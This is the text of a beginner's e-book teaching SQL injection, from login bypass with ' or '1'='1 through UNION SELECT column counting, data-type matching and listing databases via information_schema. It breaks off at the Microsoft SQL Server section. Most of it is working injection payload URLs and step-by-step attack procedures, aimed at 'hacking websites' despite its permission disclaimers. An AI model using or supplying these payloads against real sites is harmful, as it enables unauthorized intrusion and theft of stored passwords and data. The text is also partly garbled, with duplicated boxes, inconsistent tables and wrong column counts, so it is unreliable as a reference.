sql injection basics
TRANSCRIPT
© This E-book and some of its illustrations belongs to the original author of this E-book. Distributed for personal use only. Any unauthorized redistribution is illegal.
By reading this E-book you acknowledge that the author and/or his representatives/business relatives will under no circumstances be held responsible for any loss/damage of any nature brought upon you or anyone else in relation to the purchase, use, educational instructions, contents or payment etc. of this E-book. You will not perform any of the actions described in this book if they go against the local laws of your country or international law.
This guide is meant to teach you the techniques that are generally considered the most effective, as well as giving you an introduction to hacking and web programming. You do not have any guarantee for the effectiveness of the methods described in this E-book and the author and/or his representatives/business relatives will under no circumstances be held responsible for the outcome/result of reading this E-book.
All trademarks used in this book are properties of their respective owners.
Table of contents
PREFACE
1.1 Disclaimer1.2 Who is this for?1.3 Terminology
THE BASICS
2.1 What is SQL injection?2.2 User input2.3 Source code2.4 The server and the databases2.5 SQL and queries2.6 Responses2.7 First taste of SQL injection
TESTING
3.1 POST and GET3.2 What makes a parameter vulnerable?3.3 Why errors?3.4 The single quote as error trigger3.5 The content based approach3.6 Error-based fingerprinting3.7 Variable-based fingerprinting3.8 Server-Specific commands fingerprinting
EXTRACTING DATA
4.1 The concepts4.2 Data types4.3 Finding column count4.4 GROUP BY4.5 UNION SELECT for finding column count4.6 Matching data types4.7 UNION SELECT for extracting data4.8 Listing databases4.9 Listing tables4.10 Listing columns4.11 Extracting data
EDITING AND CONTROLLING
5.1 The concept5.2 Admin approach5.3 Using UPDATE5.4 Using stacked queries5.5 Defacing with INTO UPFILE5.6 Deleting data
EVADING DEFENCES
6.1 What are input filters?6.2 Blacklist filter6.3 Length-based filter6.4 Whitelist filter6.5 Whitespace removal filter6.6 Case-based filter
HIDING YOUR IDENTITY
7.1 Disclaimer7.2 IP addresses7.3 Proxies7.4 VPNs / Virtual Private Networks
REFERENCE
9.1 SQL9.2 PHP9.3 HTML9.4 CSS9.5 Javascript9.6 Comments9.7 MySQL9.8 Oracle9.9 Microsoft SQL Server9.10 Logical operators9.11 Errors9.12 Data types9.13 Tools & Tutorials
1.1 Disclaimer
This book contains instructions that are meant to be carried out only on web applications that you have legal permission to perform these actions on. Any unauthorized actions of this nature are illegal and solely your own responsibility.
1.2 Who is this E-book written for?
If you want to learn how to hack websites and outsmart the security of most websites online, this book is for you. If you are an experienced web developer, programmer or someone with no computer knowledge at all, this book will teach you how to hack websites using only your browser and your brain, without expecting you to have any background knowledge. Let’s get going!
1.3 Terminology
Some terms I use quite frequently throughout the book and their meanings are listed below:
SQL – Structured query language, a language used to communicate with databasesHTML – Hyper Text Markup Language, the language in which websites are mainly written in.SQLi - SQL injection.Programming – Giving computers instructions. A person who makes programs/applications is a programmer.Parameter – Somewhere that a value should be entered and later used by the database.Vulnerability – Possibility to hack, hole in security
1.4 About the author
In the hacker community, I am known as Ace of Spades, or simply Ace. I am a white hat hacker, meaning that I do not perform fraud or any kind of unethical hacking. I have done my best to pack every small piece of knowledge I have on the topic of SQL injection into this book. I hope that you will not only learn the techniques of finding vulnerabilities, using them to extract data and so on, but that you also learn when and where it is ok to hack, as well as what is ok to do when hacking. The activities described in this book are illegal in most countries unless you have permission from the website owner. I do not under any circumstance encourage you to break any laws, or to actually hack websites without permission. Consider my “approvals” of when and where to hack only as philosophical and/or ethical ones.
1.5 Be professional
After all, web developers have a responsibility to have security on their websites. Otherwise they deserve to be hacked. This is bullshit. After reading this book, you will have gotten some dangerous knowledge. I hope that you have the maturity and ethical willpower to contain such knowledge and to use it for the good. Hack with reason. Hack only when you have a specific reason to, and hack with moral. Don’t take down any website you can, just so you can make a thread about it afterwards. And for God’s sake, do not claim that you are helping them by replacing their hard work with some wannabe matrix Gifs and animated text bragging about your “l33t sK1Ls.” Leave people alone, don’t kill their creativity. It’s not ok to fill someone’s house with dirt, “because they didn’t have good enough security.” Whenever you find vulnerability, report it to the website owner and offer support. You might get a job offer, or a reward. By defacing, all you get is a face palm from me.
This book does explain how to deface though. I was unsure of whether or not I was going to include it, but I decided that it will always be out there. Removing knowledge is never the way. So, use it with reason.
I warmly recommend you to join my ethical hacking community at http://www.forum.whitehatorder.net
2.1 What is SQL injection?
So what is SQL injection? SQL injection is a hacking technique. More precisely, it is about smuggling your malicious instructions/commands, into the website’s source code trough user input. It is a fairly well known hacking technique, but developers seem to forget how dangerous it is. A hacker known as Rain Forrest Puppy is usually credited as the inventor of SQL injection, although every day, new exploits are being found. To really understand SQL injection, we must first understand how a website works. This will be explained in the following sections.
If you already know how websites work, skip to section 2.8
2.2 Input/OutputA website receives input from you, the user. It then uses that input to produce a response which is called the output. This response might be showing you the article you asked for by clicking a link, showing you a video you asked for by clicking play. It can also be logging you in to your account or showing you a “Wrong username or password” message. This is the case in the following example. Let’s take a look bellow
On the form above, there are three places which accept user input. The username box, the password box and the stay signed in checkbox. We say that they accept user input because they are slots where the users can enter a value of choice. The values that you put there (your password, your username and other things you enter) are the input. The fields you enter the values into are called parameters. The stay signed in checkbox is also user input even though it accepts only one of two values: on or off, checked or unchecked - or - as we call it in programming, true or false.
User input entries
2.3 Source codeWebsites are designed using a mix of many different computer languages. There is CSS which is used for designing how each element on a website looks, SQL for interacting with the database, Javascript and PHP for interactivity and so on. A complete list can be found in chapter 11. The most essential of these languages is a language called HTML. Practically speaking, all websites are written in this language. The text in HTML (and other languages) is called the source code of the website. Your browser (Internet explorer, Chrome, Opera, Firefox or something else) translates the source code into the website you see. It translates <img src=’test.png’/> into an image, <b>bold text</b> into bold text and so on. Let’s take a look at the login form again:
The source code of this form looks like this: (I removed some of it for clarity)
That code gathers the input from the user. Later in the source code, the program will search for accounts in its database where the username and password is corresponding to the ones entered by the user. But what is a database? We will take a look at databases right now and come back to this later.
2.4 The server and the databasesA server is a place for storing information. I will not go into detail on the technical aspects of it, but basically it is a computer used to operate a website. It is used to store all the information a website needs to keep (such as passwords, pages, etc.) and it is used to perform important tasks (such as sending HTML to users trying to access the website. This HTML is the source code of the webpage you see). A server contains one or more databases. A database is pretty much like a bookshelf, standing in a library which is the server. Databases again, contain tables and other info such as variables. In these tables the information is stored. It is a lot, but don’t worry! I will explain it in more detail.
Here is a basic model of the server, containing two databases, each containing three tables:
So as you can see, the server contains two databases. They are called websitedata and master. Master is a database which is in servers by default and it contains metadata such as table names. This database is very useful for hackers, but don’t worry about it until later we won’t use it right now. Websitedata on the other hand, is created by the website owner and contains the tables called “users”, “admins” and “pages”. This is how data is stored on webservers, in tables. Let’s have a closer look at tables:
ID Username Password Admin1 “aceofspades” “pass123” 12 “dave89” “ich513” 03 “John” “nhoj435” 0Red = a column | Blue = a rowSo the vertical groups (Going from top to bottom) are called columns, while the horizontal ones (going from left to right) are called rows. The first column, ID is a very common column to have in any table. The number goes up one step for each row. The ID column is used for easily finding the correct row, because there will never be more than one instance of each value in the ID column. The username and password columns are self-explanatory. They contain the username and password of users. They are encapsulated in double quotes (“). This is done to tell the computer that this is text, not numbers or commands.
2.5 SQL and queriesFirst I will explain to you what a query is. A query is a set of instructions sent to the database. They may tell the database to find some information from a table or elsewhere, or they may tell the database to create a new table, and of course tons of other things such as changing a value, adding a row and so on. Queries must be written in a language called SQL. SQL stands for Structured Query Language. Here is an example of a query written in SQL:
SELECT * FROM users WHERE username = $_GET [‘username’]AND password = $_GET [‘password’]
This query tells the database to find rows in the users table where the values in the username and password columns equal the values entered by the user. Let’s break it down line by line:
SELECT * FROM users
This tells the database to find rows in the table called users. The star (*) means “all columns.” The query could also have been
SELECT id, admin FROM users
That would have told the database to find only the values in the id and admin columns of the rows found, but back to the example. The next line is:
WHERE username = $_GET [‘username’]
This line tells the database to only care about values in rows where the value in the username column equals the username entered by the user. $_GET [‘username’]
is where the username entered by the user is stored. I will explain $_GET and $_POST in detail in the next chapter. Last line:
AND password = $_GET [‘password’]
This line adds to the requirements from the previous line. It tells it to only care about rows where the value in the password column equals the password entered by the user. Together, these lines become: Search in the table called users and return all the columns of the rows you find. Only get the rows where the username and password equals what
the user entered. When making queries in SQL, it does not matter how you capitalize or format the text.
uNioN sElEct*FrOMArticles WHEREId=1
Is the same as
UNION SELECT * FROM Articles WHERE id = 1
And so on. Keep reading, you are about to learn how the website send something back to you after handling your request.
2.7 The response
So let’s say the user enters the following values:Username: JohnPassword: nhoj435The query would become:
SELECT * FROM users WHERE username = “John”AND password = “nhoj435”
When searching through the table it will find this row:
ID Username Password Admin1 “admin” “n4g6s” 12 “Ace” “mypass123” 03 “John” “nhoj435” 0
It will find this row because when searching for matching rows, it will check if the username and password column values equal the ones in the query. It will find the third row and get all the columns back to the website because of the * which means all columns. Get it? I hope so, if not, go back and read through it again. Anyways, the website will log you in as John because it found the row with username “John” in the table and your entered password and username matched its. If the user entered, say an invalid password, the database would find no matching rows and would therefore show an error message such as “Invalid login.” This is called the response. Below is a model explaining the process of user input and server output.
2.8 First taste of SQL injection
All right! It’s time to get to work. I will now teach you the very basic technique of granting yourself access to the admin account without knowing the password. Note that very few sites are vulnerable to this as it is an extremely basic approach, but don’t worry! This is just to give you an idea of how it works. Later in the book, I will teach you the advanced stuff.
Let’s revisit the scenario from earlier, but this time, the user enters his malicious input:
Username: adminPassword: ‘ or ‘1’=’1 // this probably doesn’t make sense to you, but I will explain
The query would become:SELECT * FROM users WHERE username = ‘admin’AND password = ‘ ‘ or ‘1’=’1’
Did you notice that? We entered a single quote (‘) into the password field and suddenly we can enter commands instead of just text. As you probably remember, anything encapsulated in quotes is simply text and has no effect. Anything outside the text is either a number, or commands. The database will find every single row in the table, because no matter what the values in the row are, ‘1’ will always equal ‘1.’ This result is that the website grants access even though the password was incorrect. Even the greatest journey must start with a single step and you have just made that step. Congratulations. Feel free to read the short recap bellow.
UserUser: John
pass: nhoj435
Website$_GET['User']:
John
$_GET['pass']: nhoj435
QuerySELECT * FROM
users WHERE username =
“John”AND password =
“nhoj435”
Database
3 “John” “nhoj435” 0Response
Logged in asJohn!
Step-by-Step: Bypassing login
1. Use a known username or admin to write into the username field.2. Enter ‘ or ‘1’=’1 into the password box.3. Click the confirm button.
Congratulations, you are now on your way to become a hacker! You are now about to learn how to do research on a website and test what ways you can hack it. It will explain how to find out the database version and type and other useful info. Are you ready?
3.1 POST and GET variablesYou need to understand what GET and POST variables are before we move forward. GET and POST are two different methods websites use to send values from one page to another. Remember that login form we used earlier? Let’s have another look at it:
And now the source code: (This time less shortened)
<form method=’get’ action=’login.php’>Username: <input type=’text’ name=’user’/>Password: <input type=’text’ name=’pass’/><input type=’check’ name=’staysignedin’/> Stay signed in
</form>
So, every input has its own name. The username input field is called ‘user’ and the password field is called ‘pass.’ As you can see on top of the source code it says method = ‘get.’ This means that the values entered into this form should be passed to the next page using GET variables. You have probably seen GET variables before without knowing, they look like this:
www.sqlinjection.comule.com/login_check.php?user=myUsername&pass=pass123
Here, user and pass are passed to the login_check.php page with GET variables. Get variables are put in the URL after a question sign (?). The other way to pass values, POST variables works similarly to GET, but POST variables aren’t visible. If the form above used POST as its method, the url would look like this:
www.sqlinjection.comule.com /login_check.php
They are all gone, but they are still passed forward. GET variables seem easiest to modify. After all, all you need to do is change the value. Like this:
www.sqlinjection.comule.com/login_check.php?user=myUsername&pass=EnterAnything
The truth however, is that POST variables can be modified almost just as easily. You’ll have to use a proxy or a plugin called tamper data for Firefox. See chapter 9 for download links.
3.2 What makes a parameter vulnerable?We say that a parameter is vulnerable when it is possible to inject maliciousness into it. Basically, if you can do something that the website creator didn’t want to be possible, such as extracting data, it is vulnerable. Throughout this chapter, I will explain to you various methods of recognizing vulnerable parameters. I suggest you to try all of these techniques on websites to make a mental map of what works and what doesn’t.
3.3 The concept of input filtersAn input filter is a set of commands that removes dangerous data from user input before it is executed on the database. There is no standard for user filters. When creating a website you are also responsible for creating the input filters. The result is that lots of sites have no input
filter or a poor one. Let’s say that our website has a filter that removes all dangerous keywords, such as “FROM”, “OR” and so on, from the input:
The query now has no effect because the keyword OR was removed. There are many ways to trick this kind of filter though. More on input filters in chapter 6.
3.4 Why errors?So why do I make so much fuzz about errors? Well, because errors are the easiest ways to identify that what we entered actually came through and was executed on the database. If we are able to execute our commands on the database, we are able to choose what is displayed to some extent, which means we are able to steal things like passwords.Websites that remove all input that might cause unwanted results are called non-vulnerable which means they can’t be hacked with SQL injection. A basic rule is that if we are able to change the output to something different than it was meant to be, if we cause an error to be displayed for example, then the website is vulnerable which means it can be hacked. The first step towards hacking a website is to check if it is one of the vulnerable ones. Most are.
3.5 The single quote as an error triggerWe use the single quote character (‘) to trigger errors in the database. The single quote will always cause errors (if the website is vulnerable) because two such quotes are required to make sense. The one we enter is recognized as the beginning of some text (called a string in computer science) and it will start searching for the end of the string, which should be another such quote. When it doesn’t find one, an error arises. So remember, anytime we are going to cause an error, we will usually enter a single quote. Some websites remove the single quote from input, in these cases we will have to find another way, but that will be explained then.
3.6 The error-based approach
pass= ' or '1'='1Input filter removes
dangerous keywords
pass=' '1'='1 (the "or" is gone)
If the content of a website changes when an abnormal character (a character that is not meant to be used in the certain context) is entered, we can safely say that the website is vulnerable; because that means that what we entered actually had some effect on the server. Non-vulnerable websites will remove everything dangerous and unwanted from the input before processing it, so on a non-vulnerable website, additional input such as a single quote (‘) will simply be removed, thus not causing any change in content as they are gone by time the query is executed. In this example we will check if the website is vulnerable trough the id parameter. Allow me to demonstrate:
Let’s go to http://www.sqlinjection.comule.com/article.php?id=1
Take a look at the website. It displays an article from the database. Remember how it looks, so that you’ll be able to recognize changes when we enter abnormalities. A picture is below.
Let’s enter a single quote (‘) into the id parameter. The URL is now www.sqlinjection.comule.com/article.php?id=1’ and the output is like this
As you can see, there was a dramatic change in content. This means that the parameter is vulnerable. Some errors are like these, displaying database generated errors that describe the problem. Others though, may make your work harder as a hacker, here is an example:
This is called a generic error. If a website utilizes generic errors, the same page is shown no matter what kind of error occurred. This makes things harder for the hacker, but not impossible. We would typically have to use blind SQL injection which is a method described later in the book.
3.7 The logical approach
This method is a bit different and tests for a bit different kind of vulnerability. We will see if we can modify the output by entering logical operators. So what is a logical operator? OR is a logical parameter and so is AND. There others too but these are the most important. For a complete list of logical operators and a more detailed description of what they are, see chapter 9. Let’s go back to
www.sqlinjection.comule.com/article.php?id=5
Behind the scenes, the following query to the database occurs:
SELECT * FROM article
Step-by-Step: Testing for vulnerability trough error
1. Enter a single quote into the value www.sqlinjection.comule.com/article.php?id=5 ’ 2. Wait to see if the content changes. An error means vulnerable, no change means maybe
vulnerable.
WHERE id = 5
As explained, the star (*) means get all columns.
Let’s add +and+1=0 to the URL. You do not have to understand why yet. The URL is now www.sqlinjection.comule.com/article.php?id=5+and+1=0 and the query will become like this as the pluses (+) are translated into spaces:
SELECT * FROM articles
WHERE id = 5
AND 1 = 0
I am sure you see that something is wrong with that query. In fact it is indeed, it will never find any rows. 1 does never equal 0 and this query requires 1 to equal 0 for each row it finds. The admin bypass tricks you learned in chapter one utilized the logical operator or. Here, the logical operator is and. If the parameter is vulnerable, this will return no data and make the page look like this:
As you can see, there is no content which means our and+1=0 successfully was added to the query. You know what that means? Well it means that we successfully changed or modified what was displayed in the box. It also means we can change what is displayed to something more interesting and as you remember, that makes the parameter vulnerable. Now the other way around:
www.sqlinjection.comule.com/article.php?id=5+or+1=1
Now what was that? Instead of making no rows be returned, we make every single row in the table be displayed; because no matter what the id of the article is, 1 will always equal 1. Some sites limit the displayed rows to one, but that just makes thing a bit more time demanding. You have probably understood it by now, but here is what the query becomes:
SELECT * FROM articles
WHERE id = 5
OR 1 = 1
The result will usually be as below:
As you can see, every single article is now displayed below each other. There were only three articles in this websites database, what a shame, but never the less, we changed the content. This isn’t very helpful in itself as we were supposed to be able to see all these
Step-by-Step: Testing for vulnerability trough logical operators
1. Add +and+1=0 to the URL www.sqlinjection.comule.com/article.php?id=5 +and+1=0 2. Wait to see if anything is displayed. If an error occurs, the website might be vulnerable
but not to this most likely, if a row is displayed as normal it is not vulnerable and if no
articles anyway, but it does prove that the parameter is vulnerable. Step-by-step guide is below.
The next step from here it to camouflage your input. There are several techniques to do this. See chapter 6 for more on this.
3.7 Server version and type
The server version and type is important to know because certain things will only work on certain database types. Here is a list of the most common server types:
MySQLOracleMicrosoft SQL Server
In the following sections I will teach you how to perform the process called fingerprinting which means finding the server version. For a complete list of server types, see chapter 9. There you will also find information about each and their specifications.
3.8 The error-based approach to fingerprinting
This is actually a two-flies-one-smack method. It does not only work as fingerprinting, but it also discovers if the parameter used is vulnerable. Errors sometimes tell you what server type the website is running. You already know how to cause errors by adding a single quote so let’s do that.
www.sqlinjection.comule.com/article.php?id=5’
Step-by-Step: Testing for vulnerability trough logical operators
1. Add +and+1=0 to the URL www.sqlinjection.comule.com/article.php?id=5 +and+1=0 2. Wait to see if anything is displayed. If an error occurs, the website might be vulnerable
but not to this most likely, if a row is displayed as normal it is not vulnerable and if no
If this causes an error, the parameter is vulnerable and if the error contains “MySQL” in any context you know that the type is MySQL. If it contains any instance of the word ORA or Oracle you know it is Oracle and so on. If it mentions any server type then that is the server type in use. For complete reference of errors and what server causes which, see chapter nine.
3.9 The data-based (you see what I did there?) approach to fingerprinting
There are some variables and queries that work only on one specific server type as mentioned. For example, the variable @@version is unique to MySQL and Microsoft SQL Server, which means that if the website server contains this variable, then it must be MySQL or Microsoft SQL Server, but how to check if the website contains this specific variable? I am about to show you that. Let’s say we have our good old website on www.sqlinjection.comule.com/article.php?id=5
Step-by-Step: Fingerprinting trough error
1. Enter a single quote into the value www.sqlivictim.com/page.php?id=5 ’ 2. If an error occurs, look for a database type name. If one is mentioned you know that it is
the correct one.
To figure out if this website is running MySQL, we must make it somehow display the content of the @@version variable. We do this with a UNION SELECT statement. UNION SELECT is explained in detail in the next chapter, but what it does is basically to add the result of a second query to the result set.
4. 1 the concepts
So what do I mean by extracting data? I mean stealing the information that is stored on the server/database. This can be passwords, usernames etc. I will show how you do this in easy step by step sections and then in more advanced fashions. Before we begin with extracting data however, you must understand what data types are.
Keep in mind that the techniques explained in this chapter does not include bypassing filters so you would have to find a site that has low defense (and that you have permission to do it on, duh) in order to effectively follow the examples in the book. Bypassing filters will be explained in chapter 7. For now, I suggest using the companion website sqlinjection.comule.com
4.2 Data types
Data types are the different formats data can be stored as. Numbers are one, or integers as they are called. Text is another, yet we call them strings. There are others as well, but these are the important ones. For more info on data types, see chapter 9. So let’s initiate our hacking by finding a GET parameter on the website. All techniques described can be done with POST as well, but I will use GET here so I suggest you do the same while trying. Below is a simple overview of the two data types you know so far:
Name in programming What it really isInteger A number, 1, 2, 3 or any other full number.String A piece of text, encapsulated by double
quotes (“). “this is a string”
4.3 ORDER BY
SQL has a command called ORDER BY. It is used to sort the returned rows by one of the columns. Let’s take a look at this table called exampletable:
ID columnhere anothercolumn1 c 12 b 33 a 2
As you can see, there are four columns. Let’s say we perform the following query:
SELECT * FROM exampletable
WHERE id < 4
ORDER BY 2
This query gets all the rows because all the rows have a lower ID value than 4. If we excluded the order by line, the rows returned would be sorted by the order in which they were added to the database. Order by 2 means order by the second column. The second column is columnhere because it is number two from the left. Let’s try something a bit different.
SELECT * FROM exampletable
WHERE id < 4
ORDER BY 5
There is no fifth column. Therefore, this causes an error. This is an effective way to find number of columns being returned. More on this in 4.5
Group by is a slightly different function but for us hackers, it is exactly the same. Think of it as an alternative if ORDER BY is being filtered out
4.4 UNION SELECT
UNION SELECT is another function in SQL. It is very likely the most important function in SQL injection. It adds another query to the result. I will explain. Let’s take a look at this table again, it is called users:
ID Username Password Admin1 “admin” “n4g6s” 12 “Ace” “mypass123” 03 “John” “nhoj435” 0
And this query:
SELECT * FROM users
The result is all rows of the users table. Now let’s say that we have another table, called staff. It looks like this:
ID Username Password Admin1 “will” “td5sg” 12 “Ace” “mypass123” 1
We want to combine both these table into one result. We can use union select:
SELECT * FROM users
UNION SELECT * FROM staff
The result is:
ID Username Password Admin1 “admin” “n4g6s” 12 “Ace” “mypass123” 03 “John” “nhoj435” 01 “will” “td5sg” 12 “Ace” “mypass123” 1
Both tables combined into one. This does not mean that the tables on the database have become one, only that we made a result that is a combination of both. For this to work, both SELECT statements must have the same number of columns. If the first asks for 4 columns (as here), the others must as well. Remember that you can add static data to make them match. Say that we want to combine the results of articles which has 4 rows and authors which has 3 rows. We can do this with the following:
SELECT id, title, body, null FROM articles
UNION SELECT id, name, last_name, posts FROM authors
We added null to the query to make the amount of columns requested match. Null simply means an empty space. When using union select, each column must have the same data type as the column at the same position in the other query, but null is widely accepted. Therefore we put null in every column because it won’t cause an error no matter what data type should be in the specific column.
4.4 Finding column count with ORDER BY
Hopefully, you remember how databases are made up by tables and what a query is. If not, go back and read through it again, cause it is necessary to understand it if you want to succeed. When a GET parameter is present on a website, it almost always means that some kind of query occurs when the web page is loaded. Let’s use www.sqlinject.com/article.php?
id=1 for our example. Make sure that the parameter is vulnerable before you start. Let’s say the query performed here is
SELECT title, author, message, date
FROM articles
WHERE id = 1
The result of the query is:
ID Title Message author1 “What is this websit.. “This website is abo.. “Ace of Spades”
And it gives the following output:
The first mission of the hacker is to find out how many columns it is in the returned result. Let’s take a look at it again:
ID Title Message author date1 “What is this websit “This website is abo.. “Ace of Spades” “03.05.2011”
There are five columns as you can see, but normally we won’t know that. It is important to know however. The way we are going to discover it is trough order by. Because that function will give an error once we try to order by a column that doesn’t exist. Please read section 4.2 before moving further. This is what the URL normally is:
www.sqlinjection.comule.com/article.php?id=1
The query is:
SELECT id, title, message, author, date
FROM articles
WHERE id=1
Let’s change the URL to the following. The plus sign (+) will be translated into a space so put it wherever it should be a space.
www.sqlinjection.comule.com/article.php?id=1+order+by+1
As you hopefully remember, the 1 in the very end of the URL means that it should order the results by the first column. Let’s take a look at what the query becomes now:
SELECT id, title, message, author, date
FROM articles
WHERE id=1 order by 1
As you can see, we managed to change the query quite a bit. 1 is a valid column (it is the ID column because the ID column is number 1 from the left) so this is a legal query. The content most likely won’t change. That tells us that there are 1 or more columns. Let’s change that number up to 10.
www.sqlinjection.comule.com/article.php?id=1+order+by+10
The query is now
SELECT id, title, message, author, date
FROM articles
WHERE id=1 order by 10
10 is not a valid column. Therefore, the database will produce an error.
You now know that there are less than 10 columns. If it did not produce any errors, you would have known that there are 10 or more columns. As we know that the amount is smaller, we will go down to 6.
www.sqlinjection.comule.com/article.php?id=1+order+by+7
The query is now
SELECT id, title, message, author, date
FROM articles
WHERE id=1 order by 7
7 isn’t a valid column either so another error is produced. We go down to 5 this time.
www.sqlinjection.comule.com/article.php?id=1+order+by+5
The query is now
SELECT id, title, message, author, date
FROM articles
WHERE id=1 order by 5
5 is a valid column, we now know that the number of columns is 5 or higher and lower than 7. In other terms, it can be 5 columns or 6 columns. We try 6
www.sqlinjection.comule.com/article.php?id=1+order+by+6
The query is now
SELECT id, title, message, author
FROM articles
WHERE id=1 order by 6
Error message! This means there are less than 6 columns and we already know the number is 5 or higher. The conclusion is obviously that there are 5 columns. Write it down in a notepad or something so you don’t forget when hacking a website.
Step-by-Step: Finding column count with order by
1. Add +order+by+5 to the URL. If an error occurs, the number of columns is higher than 5, otherwise it is either 5 or lower.
2. Try it with different values until you know for sure how many columns there are.
4.5 UNION SELECT for finding column count
UNION SELECT can also be used to figure out how many columns there are in the result table. It is easier, but less fun and convenient than the ORDER BY function. As you hopefully remember, UNION SELECT is used to combine two sets of results and it gives an error if the two results have a different amount of columns. Let’s go to the proper URL first:
www.sqlinject.com/article.php?id=1
We use the same method to inject further queries into the URL.
www.sqlinjection.comule.com/article.php?id=1+union+select+null
So we injected the following
Union select null
The query is now
SELECT id, title, message, author, date
FROM articles
WHERE id=1
union select null
Woah! There aren’t equally many columns in each select statement. Therefore this causes an error. We now know that there is more than one column. Let’s add another null
www.sqlinjection.comule.com/article.php?id=1+union+select+null,null
So we injected the following
Union select null,null
The query is now
SELECT id, title, message, author, date
FROM articles
WHERE id=1
union select null,null
Once again, an error is produced because the numbers of columns aren’t equal. Keep adding ,null until it does not produce an error:
www.sqlinjection.comule.com/article.php?id=1+union+select+null,null,null
www.sqlinjection.comule.com/article.php?id=1+union+select+null,null,null,null
www.sqlinjection.comule.com/article.php?id=1+union+select+null, null, null,null,null
The last one has 5 columns (all null) and does not produce an error. Therefore we know that there are 5 columns in the result table.
4.6 Matching data types
Step-by-Step: Finding column count with union select
1. Add +union+select+null to the URL. If an error occurs, the number of columns is higher than 1, otherwise it is 1 because the number of nulls is 1.
2. Add ,null to the url until it does not produce an error. When no error is returned you know that the number of columns equal the number of null’s in the URL.
We need to figure out which data type fits in each column of the result query. Go back to 4.2 or see chapter 9 for more on data types and what they are. We will find out which data types must be used, with good old UNION SELECT. Let’s go to www.sqlinjection.comule.com/article.php?id=5 as usual.
I know you are getting tired of the screenshot, but just in case you aren’t 100% sure, it looks like this:
By now you should know how the website performs a query to find the requested article. If not, go back and read in chapter 1. We know that there are five columns in the result. We therefore add the following:
www.sqlinjection.comule.com/article.php?id=5+union+select+null,null,null,null,null
Five nulls, one in each column. The null value is accepted in any column because it doesn’t have a data type, but if we want to extract something useful, we need to figure which columns can take which data types. We start with strings. Try adding a string into each column, one by one. Where an error occurs, it is not the correct data type.
! Note: If the database keeps giving errors it might be because it removes or freaks out (pardon the expression) when quotes (‘) are added. Try using @@version or another variable instead of ‘test’. It will return the version as a string but without requiring any single quotes (‘) to go through the input. For reference on which variables you can use on each kind of database server, see chapter 9.
www.sqlinjection.comule.com/article.php?id=5+union+select+’test’,null,null,null,null
Error, the first column is apparently not a string
www.sqlinjection.comule.com/article.php?id=5+union+select+null,’test’,null,null,null
No error, so the second column must be a string
www.sqlinjection.comule.com/article.php?id=5+union+select+null,null,’test’,null,null
No error, so the second column must be a string
www.sqlinjection.comule.com/article.php?id=5+union+select+null,null,null,’test’,null
No error here either. String in the fourth
www.sqlinjection.comule.com/article.php?id=5+union+select+null,null,null,null,’test’
Error. The final column is not a string.
If this causes an error on every single column, you should try the method described in orange.
www.sqlinjection.comule.com/article.php?id=5+union+select+ @@version ,null,null,null,null
Error, the first column is apparently not a string
www.sqlinjection.comule.com/article.php?id=5+union+select+null,@@version,null,null,null
No error, so the second column must be a string
www.sqlinjection.comule.com/article.php?id=5+union+select+null,null,@@version,null,null
No error, so the second column must be a string
www.sqlinjection.comule.com/article.php?id=5+union+select+null,null,null,@@version,null
No error here either. String in the fourth
www.sqlinjection.comule.com/article.php?id=5+union+select+null,null,null,null,@@version
Error. The final column is not a string.
4.7 UNION SELECT for extracting data
Step-by-Step: Finding data types with UNION SELECT
1. Add +union+select+null,null,null to the URL. Change the amount of nulls to match the amount of discovered columns. Separate each null with a comma, but no comma after the last null.
2. Change the first column into a string +union+select+’test’,null,null if an error occurs, the first column is not a string. Move the string to the next spot +union+select+null,’test’,null if an error occurs, the second column is not a string either. Do it with every column.
So, finally we will have some action after all the research. We will use UNION SELECT to add a second query to the original one. In this way we will make the data we are interested in appear on the screen. You guessed it, let’s go to
www.sqlinjection.comule.com/article.php?id=5
And screenshot:
Let’s make the URL the following:
www.sqlinject.comule.com/article.php?id=5+union+select+null,’Test1’,’Test2’,’Test3’,null
We put a test string in each of the columns that we discovered to be accepting strings and null in the others. The query becomes like this:
SELECT id, title, content, author, date FROM articles
WHERE id = 5
UNION SELECT null,’Test1’,’Test2’,’Test3’,null
What this query is meant to do, is to find the requested page in the database and display it. We added a second query and now, let’s see if any of our input is displayed:
Success! Test1 and Test2 were displayed in a second article below. This means we can modify what is displayed, which is great.
! Note: If no change in content happens when doing this on a website, it might be because the page limits the amount of results to 1. When this is the case, try adding +and+1=0+ between the original URL and the query, like this:
www.sqlinjection.comule.com/article.php?id=5+and+1=0+union+select....
Now let’s extract something a bit more useful. The following instructions depend on which server type is in use. I will teach how to do it for each of the most common kinds of database servers: Microsoft SQL Server, Oracle and MySQL.
Step-by-Step: Extracting data with UNION SELECT
1. Add +union+select+column1,column2+from+table to the URL.
4.8 Listing databases
MySQL
In MySQL servers, there is a database called information_schema. This database contains so called metadata. Metadata, which means data about the other data in the database, is extremely important to the hacker, as he do not know what tables there are on the database, what columns are in each table and so on. We will take a look at a database called information_schema. It contains a table with all the tables (yes, you heard right), a table with all columns on the entire server and much more. To access a table from a specific database, we do as following:
databasename.tablename
That would access the table called tablename on the databasename database. For a full overview of the important databases and their tables, see chapter 9. Now let’s move forward. We are currently at www.sqlinject.comule.com/article.php?id=5+union+select+null,’Test1’,’Test2’,’Test3’,null
And we saw that the column with ‘Test3’ in it isn’t displayed so we’ll remove that and put null instead, just for clarity: www.sqlinject.comule.com/article.php?id=5+union+select+null,’Test1’,’Test2’,null,null
We have two columns that will be visible. Now let’s actually extract data instead of using static string. www.sqlinject.comule.com/article.php?id=5+union+select+null,schema_name,null,null,null+from+information_schema.schemata
I removed some of the underline because it made it hard to see that there is an underline in the names. There is only need for one column here, for the schema_name which is the name of the databases. Therefore, the second column has been changed into null. You will get to see all the database names. The screenshot is here:
So you see two database names names here. Usually it is only about two databases on a website. Look for one that doesn’t seem to be a default MySQL database. As you can imagine, a6886241_db is not a MySQL default database, as it is the only other database than information_schema. This means it contains data uploaded by the owner. Note it down; it might come in handy later. If the request causes an insane load time, try adding the following to the end of the query:
+limit+0,15
The 0 means start at the first result and the 15 means only 15 results at a time. When you have looked through the 15 first results, change it to +limit+15,15 and keep going like that, making the first number 15 higher for each time. Note that the interesting data is usually at the very end. This technique also applies to the other sections on extracting data.
Step-by-Step: Finding databases on MySQL
1. Add the following to the URL: +union+select+null,schema_name,null+from+information_schema.schemata
2. Adjust the query accordingly to how many columns you have discovered and which columns are displayed.
Microsoft SQL Server
